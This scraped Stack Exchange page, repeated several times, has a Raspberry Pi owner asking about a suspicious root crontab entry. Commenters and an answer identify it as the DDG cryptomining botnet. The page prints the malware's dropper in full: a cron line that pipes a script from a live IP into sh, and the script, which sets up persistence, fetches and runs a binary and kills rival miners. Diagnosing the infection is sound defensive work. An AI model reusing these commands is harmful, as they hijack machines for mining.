Suspicious crontab entryHow can I kill minerd malware on an AWS EC2 instance? (compromised server)How do I add an entry to my crontab?Crontab entry with hour range going over midnightCrontab suspicious activitycrontab entry for a command to run every week and three months?Cron only occasionally sends e-mail on output and errorsSuspicious traffic in nethogs on fresh installsuspicious activity in the server?process keeps on startingHow does cron set the environment variables in /etc/cron.d/* and /etc/cron.d/?

Adding elements to some sublists of unequal length

Is there a way to make a Minor key sound "less dark"?

Does Australia produce unique 'specialty steel'?

How to temporarily replace Latin characters with Greek

How effective are nunchaku as a choking weapon?

Why did a young George Washington sign a document admitting to assassinating a French military officer?

Translation Golf XLVIII — We're sorry to see you go

5v home network

XGBoost validation for number of trees

How to discipline overeager engineer

What damaging options does a lich have while in an anti-magic field?

Why do previous versions of Debian packages vanish in the package repositories? (highly relevant for version-controlled system configuration)

What are the different ways one can refer to the home in everyday French

How to make a gift without seeming creepy?

Can you be promoted and then fired for-cause? (Performance)

Why is it so hard to land on The Moon?

Why can I ping 10.0.0.0/8 addresses from a 192.168.1.0/24 subnet?

Modify real part and leaves imaginary part unchanged

How could "aggressor" pilots fly foreign aircraft without speaking the language?

Little Endian Number to String Conversion

Closest thing to Infinity Gauntlet in DnD5e

Should I withdraw my paper because the editor is delaying the report?

How can I float a pin that otherwise should be low?

Why is matter-antimatter asymmetry surprising, if asymmetry can be generated by a random walk in which particles go into black holes?



Suspicious crontab entry


How can I kill minerd malware on an AWS EC2 instance? (compromised server)How do I add an entry to my crontab?Crontab entry with hour range going over midnightCrontab suspicious activitycrontab entry for a command to run every week and three months?Cron only occasionally sends e-mail on output and errorsSuspicious traffic in nethogs on fresh installsuspicious activity in the server?process keeps on startingHow does cron set the environment variables in /etc/cron.d/* and /etc/cron.d/?






.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty
margin-bottom:0;









5

















I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.



Crontab entry:



*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh


The contents of http://103.219.112.66:8000/i.sh are:



export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -


My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.



What is this? What should I do?










share|improve this question







New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.


















  • 5





    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    7 hours ago






  • 2





    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    7 hours ago






  • 4





    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    6 hours ago






  • 2





    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    6 hours ago






  • 2





    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    4 hours ago

















5

















I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.



Crontab entry:



*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh


The contents of http://103.219.112.66:8000/i.sh are:



export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -


My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.



What is this? What should I do?










share|improve this question







New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.


















  • 5





    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    7 hours ago






  • 2





    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    7 hours ago






  • 4





    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    6 hours ago






  • 2





    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    6 hours ago






  • 2





    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    4 hours ago













5












5








5








I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.



Crontab entry:



*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh


The contents of http://103.219.112.66:8000/i.sh are:



export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -


My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.



What is this? What should I do?










share|improve this question







New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.











I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.



Crontab entry:



*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh


The contents of http://103.219.112.66:8000/i.sh are:



export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk 'print $2' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk 'print $2' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -


My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.



What is this? What should I do?







security cron malware






share|improve this question







New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.










share|improve this question







New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.








share|improve this question




share|improve this question



share|improve this question






New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.








asked 8 hours ago









Peter DamPeter Dam

313 bronze badges




313 bronze badges




New contributor



Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.




New contributor




Peter Dam is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.












  • 5





    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    7 hours ago






  • 2





    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    7 hours ago






  • 4





    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    6 hours ago






  • 2





    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    6 hours ago






  • 2





    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    4 hours ago












  • 5





    It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

    – Wildcard
    7 hours ago






  • 2





    Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

    – kemotep
    7 hours ago






  • 4





    @kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

    – frostschutz
    6 hours ago






  • 2





    I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

    – kemotep
    6 hours ago






  • 2





    The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

    – Hans-Martin Mosner
    4 hours ago







5




5





It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

– Wildcard
7 hours ago





It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.

– Wildcard
7 hours ago




2




2





Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

– kemotep
7 hours ago





Is your raspberry pi open to the internet? What is your raspberry pi running? This is the only result on google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.

– kemotep
7 hours ago




4




4





@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

– frostschutz
6 hours ago





@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet

– frostschutz
6 hours ago




2




2





I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

– kemotep
6 hours ago





I found it. Its crazy that the IP is registered to an Indonesian Government site. Also looks like there is nearly 2000 other ips delivering this payload.

– kemotep
6 hours ago




2




2





The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

– Hans-Martin Mosner
4 hours ago





The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.

– Hans-Martin Mosner
4 hours ago










1 Answer
1






active

oldest

votes


















7


















It is a DDG mining botnet , how it work :



  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers



U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)






share|improve this answer























  • 1





    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    3 hours ago












Your Answer








StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/4.0/"u003ecc by-sa 4.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);







Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.









draft saved

draft discarded
















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f544811%2fsuspicious-crontab-entry%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









7


















It is a DDG mining botnet , how it work :



  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers



U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)






share|improve this answer























  • 1





    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    3 hours ago















7


















It is a DDG mining botnet , how it work :



  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers



U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)






share|improve this answer























  • 1





    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    3 hours ago













7














7










7









It is a DDG mining botnet , how it work :



  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers



U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)






share|improve this answer
















It is a DDG mining botnet , how it work :



  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written with go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers



U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)







share|improve this answer















share|improve this answer




share|improve this answer



share|improve this answer








edited 6 hours ago

























answered 6 hours ago









GAD3RGAD3R

31.1k19 gold badges63 silver badges124 bronze badges




31.1k19 gold badges63 silver badges124 bronze badges










  • 1





    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    3 hours ago












  • 1





    Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

    – Peter Dam
    3 hours ago







1




1





Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

– Peter Dam
3 hours ago





Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.

– Peter Dam
3 hours ago











Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.









draft saved

draft discarded

















Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.












Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.











Peter Dam is a new contributor. Be nice, and check out our Code of Conduct.














Thanks for contributing an answer to Unix & Linux Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid


  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f544811%2fsuspicious-crontab-entry%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







Popular posts from this blog

Canceling a color specificationRandomly assigning color to Graphics3D objects?Default color for Filling in Mathematica 9Coloring specific elements of sets with a prime modified order in an array plotHow to pick a color differing significantly from the colors already in a given color list?Detection of the text colorColor numbers based on their valueCan color schemes for use with ColorData include opacity specification?My dynamic color schemes

Invision Community Contents History See also References External links Navigation menuProprietaryinvisioncommunity.comIPS Community ForumsIPS Community Forumsthis blog entry"License Changes, IP.Board 3.4, and the Future""Interview -- Matt Mecham of Ibforums""CEO Invision Power Board, Matt Mecham Is a Liar, Thief!"IPB License Explanation 1.3, 1.3.1, 2.0, and 2.1ArchivedSecurity Fixes, Updates And Enhancements For IPB 1.3.1Archived"New Demo Accounts - Invision Power Services"the original"New Default Skin"the original"Invision Power Board 3.0.0 and Applications Released"the original"Archived copy"the original"Perpetual licenses being done away with""Release Notes - Invision Power Services""Introducing: IPS Community Suite 4!"Invision Community Release Notes

199年 目錄 大件事 到箇年出世嗰人 到箇年死嗰人 節慶、風俗習慣 導覽選單